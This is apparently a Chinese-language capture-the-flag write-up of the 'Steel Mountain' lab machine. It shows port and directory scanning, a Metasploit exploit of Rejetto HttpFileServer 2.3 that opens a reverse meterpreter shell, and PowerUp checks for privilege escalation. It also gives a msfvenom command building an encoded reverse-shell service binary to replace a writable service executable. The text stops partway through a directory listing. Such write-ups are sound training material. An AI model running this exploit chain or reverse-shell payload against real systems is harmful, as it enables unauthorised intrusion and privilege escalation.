Steel Mountain
前言
bilibili:Zacarx
www.zacarx.com
信息收集
nmap -p- -A IP
80,8080
#扫描端口,发现8080,看到其服务为HttpFileServer 2.3
┌──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.120.68/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Oct 26 14:07:07 2022
URL_BASE: http://10.10.120.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.120.68/ ----
==> DIRECTORY: http://10.10.120.68/img/
+ http://10.10.120.68/index.html (CODE:200|SIZE:772)
---- Entering directory: http://10.10.120.68/img/ ----
...
┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit HttpFileServer 2.3
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
...
┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit -p 49125
Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49125
Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
.......
漏洞利用
msf6 > search HttpFileServer 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machin
e or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.120.68
rhosts => 10.10.120.68
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set Lhost 10.17.0.91
Lhost => 10.17.0.91
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.17.0.91:4444
[*] Using URL: http://10.17.0.91:8080/rO38EVW
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rO38EVW
[*] Sending stage (175686 bytes) to 10.10.120.68
sessions 1
^C[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YcIgpZ.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : STEELMOUNTAIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: STEELMOUNTAIN\bill
meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-26 22:11:25 +0800 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 20:18:29 +0800 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 Documents and Settings
100666/rw-rw-rw- 3162859 fil 2020-10-13 03:06:12 +0800 EC2-Windows-Launch.zip
040777/rwxrwxrwx 0 dir 2013-08-22 23:52:33 +0800 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-09-30 08:42:46 +0800 Program Files
040777/rwxrwxrwx 4096 dir 2019-09-30 08:46:20 +0800 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-09-30 08:47:36 +0800 ProgramData
040777/rwxrwxrwx 0 dir 2019-09-26 22:04:30 +0800 System Volume Information
040555/r-xr-xr-x 4096 dir 2019-09-27 14:29:03 +0800 Users
040777/rwxrwxrwx 24576 dir 2020-10-13 03:09:13 +0800 Windows
100444/r--r--r-- 398356 fil 2014-03-22 02:49:49 +0800 bootmgr
040777/rwxrwxrwx 0 dir 2019-09-26 22:17:28 +0800 inetpub
100666/rw-rw-rw- 13182 fil 2020-10-13 03:06:12 +0800 install.ps1
000000/--------- 0 fif 1970-01-01 08:00:00 +0800 pagefile.sys
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-09-26 22:11:25 +0800 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 All Users
040555/r-xr-xr-x 8192 dir 2014-03-22 03:18:16 +0800 Default
040777/rwxrwxrwx 0 dir 2013-08-22 22:48:41 +0800 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 23:39:32 +0800 Public
040777/rwxrwxrwx 8192 dir 2019-09-28 00:09:05 +0800 bill
100666/rw-rw-rw- 174 fil 2013-08-22 23:37:57 +0800 desktop.ini
meterpreter > cd ./bill
meterpreter > ls
Listing: C:\Users\bill
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:24 +0800 .groovy
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 AppData
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Application Data
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Contacts
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Cookies
040555/r-xr-xr-x 0 dir 2019-09-28 00:08:24 +0800 Desktop
040555/r-xr-xr-x 4096 dir 2019-09-27 19:07:07 +0800 Documents
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Downloads
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Favorites
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Links
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Local Settings
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Music
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2020-10-13 03:12:47 +0800 NTUSER.DAT
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:04 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.0.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:05 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.1.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2019-09-28 00:09:05 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.2.regtrans-ms
100666/rw-rw-rw- 65536 fil 2019-09-28 00:09:04 +0800 NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.blf
100666/rw-rw-rw- 65536 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-09-27 14:29:12 +0800 NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 NetHood
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Pictures
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 PrintHood
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Recent
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Saved Games
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Searches
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 SendTo
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Start Menu
040777/rwxrwxrwx 0 dir 2019-09-27 14:29:03 +0800 Templates
040555/r-xr-xr-x 0 dir 2019-09-27 19:07:07 +0800 Videos
100666/rw-rw-rw- 483328 fil 2019-09-27 14:29:03 +0800 ntuser.dat.LOG1
100666/rw-rw-rw- 77824 fil 2019-09-27 14:29:03 +0800 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-09-27 14:29:03 +0800 ntuser.ini
meterpreter > cd C:\\Users\\bill\\Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-09-27 19:07:07 +0800 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 20:42:38 +0800 user.txt
meterpreter > cat user.txt
��b04763b6fcf51fcd7c13abc7db4fd365
提权
我们下载文件https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
并上传到靶机
输入powershell_shell 回车
然后运行PowerUp.ps1
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart : False
Name : IObitUnSvr
Check : Modifiable Service Files
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart : False
Name : LiveUpdateSvc
Check : Modifiable Service Files
我们看到AdvancedSystemCareService9可以进行重启操作
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
因此,我们可以上传一个可执行的反向shell文件,并替换原本的文件这样就可以拿到root权限
操作如下:
我们先生成一个文件
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.0.91 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
然后访问源文件地址
meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Common Files
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:48 +0800 IObit
040777/rwxrwxrwx 4096 dir 2014-03-22 03:08:30 +0800 Internet Explorer
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Microsoft.NET
040777/rwxrwxrwx 0 dir 2019-09-30 08:46:20 +0800 Uninstall Information
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:33 +0800 Windows Mail
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Windows NT
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 23:37:57 +0800 desktop.ini
meterpreter > cd IObit
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2022-10-26 14:03:29 +0800 Advanced SystemCare
040777/rwxrwxrwx 16384 dir 2019-09-27 13:35:24 +0800 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:50 +0800 LiveUpdate
meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Common Files
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:48 +0800 IObit
040777/rwxrwxrwx 4096 dir 2014-03-22 03:08:30 +0800 Internet Explorer
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Microsoft.NET
040777/rwxrwxrwx 0 dir 2019-09-30 08:46:20 +0800 Uninstall Information
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:33 +0800 Windows Mail
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 Windows NT
040777/rwxrwxrwx 0 dir 2013-08-22 23:39:30 +0800 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 23:37:57 +0800 desktop.ini
meterpreter > cd Advanced\ SystemCare
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 5091616 fil 2016-08-17 02:03:56 +0800 ASC.exe
100777/rwxrwxrwx 691488 fil 2015-12-29 04:48:34 +0800 ASCDownload.exe
100666/rw-rw-rw- 166176 fil 2015-12-29 04:47:32 +0800 ASCExtMenu.dll
100666/rw-rw-rw- 187680 fil 2015-12-29 04:47:30 +0800 ASCExtMenu_64.dll
100777/rwxrwxrwx 574240 fil 2016-03-04 08:16:34 +0800 ASCInit.exe
100666/rw-rw-rw- 743 fil 2019-09-26 23:17:50 +0800 ASCInit.log
100777/rwxrwxrwx 452384 fil 2016-07-26 01:01:08 +0800 ASCService.exe
100666/rw-rw-rw- 104270 fil 2022-10-26 15:12:56 +0800 ASCService.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:49 +0800 ASCServiceLog
100777/rwxrwxrwx 2023712 fil 2016-07-28 02:24:22 +0800 ASCTray.exe
100777/rwxrwxrwx 555808 fil 2015-12-29 05:06:42 +0800 ASCUpgrade.exe
100777/rwxrwxrwx 2400528 fil 2019-09-26 23:18:22 +0800 ASCVER.exe
100777/rwxrwxrwx 599328 fil 2015-12-29 04:48:46 +0800 AUpdate.exe
100666/rw-rw-rw- 64800 fil 2015-12-29 04:48:24 +0800 About.dll
100777/rwxrwxrwx 310560 fil 2016-07-28 02:24:20 +0800 About.exe
100666/rw-rw-rw- 21506 fil 2019-09-26 23:18:14 +0800 ActionCenter2.log
100777/rwxrwxrwx 2254624 fil 2016-01-08 09:13:48 +0800 ActionCenterDownloader.exe
100777/rwxrwxrwx 1917728 fil 2016-04-30 02:12:38 +0800 AutoCare.exe
100777/rwxrwxrwx 191264 fil 2015-12-29 04:52:24 +0800 AutoReactivator.exe
100777/rwxrwxrwx 1194784 fil 2016-04-30 02:12:40 +0800 AutoSweep.exe
100777/rwxrwxrwx 1403680 fil 2016-07-21 00:15:38 +0800 AutoUpdate.exe
100666/rw-rw-rw- 18536 fil 2019-09-27 16:32:33 +0800 AutoUpdate.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Backup
100777/rwxrwxrwx 1063200 fil 2016-03-08 02:14:22 +0800 BrowserCleaner.exe
100666/rw-rw-rw- 131872 fil 2016-07-21 00:15:42 +0800 CPUIDInterface.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:42 +0800 Config
100777/rwxrwxrwx 451872 fil 2015-12-29 04:49:22 +0800 DNSProtect.exe
100777/rwxrwxrwx 513528 fil 2016-04-13 04:10:24 +0800 Dashlane_Launcher.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:51 +0800 Database
100777/rwxrwxrwx 2172704 fil 2016-05-07 00:50:26 +0800 DefaultProgram.exe
100666/rw-rw-rw- 11220 fil 2016-02-23 02:18:02 +0800 DetectionEx.ini
100777/rwxrwxrwx 438560 fil 2016-01-12 04:30:04 +0800 DiskDefrag.exe
100666/rw-rw-rw- 607520 fil 2015-12-29 04:49:12 +0800 DiskMap.dll
100666/rw-rw-rw- 127776 fil 2016-07-21 00:15:44 +0800 DiskScan.dll
100777/rwxrwxrwx 72992 fil 2015-12-29 04:49:16 +0800 DiskScan.exe
100777/rwxrwxrwx 110368 fil 2016-01-12 09:54:36 +0800 Display.exe
100666/rw-rw-rw- 586 fil 2022-10-26 14:03:06 +0800 Display_log.txt
100666/rw-rw-rw- 14716 fil 2013-07-20 09:31:32 +0800 DownloadApplication.xml
100666/rw-rw-rw- 81539 fil 2016-01-08 05:10:46 +0800 EULA.rtf
100777/rwxrwxrwx 1221408 fil 2016-07-21 00:15:46 +0800 FeedBack.exe
100666/rw-rw-rw- 454432 fil 2015-12-29 05:06:54 +0800 FfSweep.dll
100777/rwxrwxrwx 4939536 fil 2019-09-26 23:18:20 +0800 FreeBigupgrade1211.exe
100777/rwxrwxrwx 1019680 fil 2015-12-29 05:10:30 +0800 Homepage.exe
100666/rw-rw-rw- 750880 fil 2016-01-21 09:23:28 +0800 HomepageSvc.dll
100666/rw-rw-rw- 387360 fil 2016-03-04 04:21:28 +0800 ICONPIN32.dll
100777/rwxrwxrwx 380192 fil 2016-03-04 04:21:30 +0800 ICONPIN32.exe
100666/rw-rw-rw- 614176 fil 2016-03-04 04:21:34 +0800 ICONPIN64.dll
100777/rwxrwxrwx 582944 fil 2016-03-04 04:21:36 +0800 ICONPIN64.exe
100777/rwxrwxrwx 9474336 fil 2016-07-09 05:42:24 +0800 IObitUninstaller.exe
100666/rw-rw-rw- 899872 fil 2016-07-21 00:15:50 +0800 InfoHelp.dll
100777/rwxrwxrwx 21280 fil 2016-03-10 07:56:44 +0800 Iobit_RefreshTaskBar.exe
100666/rw-rw-rw- 15 fil 2014-07-23 05:15:36 +0800 Lang.dat
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Language
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:19 +0800 LatestNews
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 LinkImages
100777/rwxrwxrwx 2960672 fil 2016-07-21 00:15:54 +0800 LiveUpdate.exe
100666/rw-rw-rw- 768 fil 2019-09-26 23:17:49 +0800 LiveUpdate.log
100777/rwxrwxrwx 667424 fil 2015-12-29 04:49:32 +0800 LocalLang.exe
100777/rwxrwxrwx 1530656 fil 2016-07-21 00:15:56 +0800 Monitor.exe
100777/rwxrwxrwx 533792 fil 2015-12-29 04:49:38 +0800 MonitorDisk.exe
100777/rwxrwxrwx 2111776 fil 2016-04-30 02:12:52 +0800 MyWin10.exe
100777/rwxrwxrwx 569632 fil 2016-07-23 01:20:00 +0800 Nfeatures.exe
100777/rwxrwxrwx 116000 fil 2015-12-29 04:49:40 +0800 NoteIcon.exe
100666/rw-rw-rw- 48416 fil 2015-12-29 04:49:44 +0800 NtfsData.dll
100666/rw-rw-rw- 784160 fil 2016-07-21 00:16:04 +0800 OFCommon.dll
100777/rwxrwxrwx 918816 fil 2016-07-21 00:16:06 +0800 PPUninstaller.exe
100666/rw-rw-rw- 70432 fil 2015-12-29 04:49:52 +0800 PowerConfig.dll
100666/rw-rw-rw- 629536 fil 2015-12-29 04:49:58 +0800 ProductStatistics.dll
100777/rwxrwxrwx 1044256 fil 2016-07-28 02:24:26 +0800 QuickSettings.exe
100777/rwxrwxrwx 152352 fil 2015-12-29 04:50:18 +0800 ReProcess.exe
100777/rwxrwxrwx 719648 fil 2015-12-29 04:50:02 +0800 RealTimeProtector.exe
100777/rwxrwxrwx 2052896 fil 2016-05-10 04:22:08 +0800 Register.exe
100777/rwxrwxrwx 1094944 fil 2016-07-28 02:24:28 +0800 Reinforce.exe
100666/rw-rw-rw- 1406 fil 2019-09-26 23:18:14 +0800 Reinforce.log
100777/rwxrwxrwx 490272 fil 2016-01-05 05:44:00 +0800 Report.exe
100777/rwxrwxrwx 1723680 fil 2016-07-21 09:07:08 +0800 RescueCenter.exe
100777/rwxrwxrwx 1326504 fil 2015-12-26 03:55:20 +0800 SPInit.exe
100777/rwxrwxrwx 8383688 fil 2016-07-29 01:07:04 +0800 SPSetup.exe
100666/rw-rw-rw- 783136 fil 2015-12-29 04:45:54 +0800 SPUrlScanner.dll
100666/rw-rw-rw- 1293088 fil 2015-12-29 04:50:24 +0800 Scan.dll
100777/rwxrwxrwx 802592 fil 2016-04-27 05:00:24 +0800 ScreenShot.exe
100666/rw-rw-rw- 1024000 fil 2022-10-26 14:03:29 +0800 SecurityHoleScan.log
100777/rwxrwxrwx 1887520 fil 2016-07-21 00:16:18 +0800 SendBugReportNew.exe
100777/rwxrwxrwx 1720096 fil 2016-01-12 04:30:12 +0800 SoftUpdateTip.exe
100666/rw-rw-rw- 202 fil 2019-09-26 23:18:13 +0800 SpeedUp.log
100777/rwxrwxrwx 897824 fil 2015-12-29 04:50:46 +0800 StartupInfo.exe
100777/rwxrwxrwx 2630944 fil 2016-07-28 02:26:32 +0800 Suc11_RegistryCleaner.exe
100777/rwxrwxrwx 1179936 fil 2016-07-21 00:30:20 +0800 Suc12_DiskCleaner.exe
100777/rwxrwxrwx 561440 fil 2016-01-06 09:47:42 +0800 Suo10_SmartRAM.exe
100777/rwxrwxrwx 1767712 fil 2016-07-21 00:30:26 +0800 Suo11_InternetBooster.exe
100777/rwxrwxrwx 4190496 fil 2016-07-21 00:30:28 +0800 Suo12_StartupManager.exe
100777/rwxrwxrwx 1421088 fil 2016-05-07 00:50:38 +0800 Sur13_WinFix.exe
100666/rw-rw-rw- 82720 fil 2015-12-29 04:50:48 +0800 SysRest.dll
100777/rwxrwxrwx 607520 fil 2015-12-29 04:50:50 +0800 TaskHelper.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Toolbox_Language
100777/rwxrwxrwx 3360032 fil 2016-04-23 08:40:54 +0800 UninstallPromote.exe
040777/rwxrwxrwx 4096 dir 2019-09-27 16:32:33 +0800 Update
100666/rw-rw-rw- 8386 fil 2016-07-28 05:09:38 +0800 Update History.txt
100777/rwxrwxrwx 1355552 fil 2016-07-22 05:32:12 +0800 Wizard.exe
100666/rw-rw-rw- 1407264 fil 2015-12-29 04:49:04 +0800 cpuidsdk.dll
100666/rw-rw-rw- 72992 fil 2015-12-29 04:49:06 +0800 datastate.dll
100777/rwxrwxrwx 242464 fil 2015-12-29 04:49:08 +0800 delayLoad.exe
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 drivers
